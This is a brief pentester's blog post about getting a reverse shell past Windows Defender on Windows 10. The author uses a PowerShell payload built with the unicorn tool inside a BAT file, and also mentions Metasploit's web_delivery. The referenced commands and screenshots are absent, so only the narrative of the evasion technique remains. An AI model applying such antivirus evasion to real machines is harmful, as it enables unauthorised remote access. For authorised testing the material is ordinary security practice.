Main reason to write about it was that I found cool idea to 'bypass' Windows Defender installed with Windows 10. I mean I found it on github ;) Kudos for the author!
Nothing new but maybe you'll find it useful during your pentest(s) ;) Some details for my case:
(...was: normaly I will use RDP to connect to the target and 'add my disk' to the connection. Then you can copy/paste your payload.exe/.ps1... but this time it wasn't possible, so...)
With Windows Defender enabled (by default afaik) I wasn't able to run meterpreter-based payload prepared with Metasploit.
I prepared powershell-payload with unicorn and saved in on target machine in BAT file:
And now we can see some results:
As you can see there is a green-screen so we are safe. ;]
After few seconds there should be another nice screen:
...and now - you are already (reverse_sh) connected, or, user will click anything (ok/cancel) and revshell will be connected. No matther what - you should already received reverse shell.
I googled a bit more and found a cool idea (pretty similar to the one used in unicorn) - web_delivery described on Offensive Security web page.
Checking:
Maybe you will find it useful too:
Cheers
Brak komentarzy:
Prześlij komentarz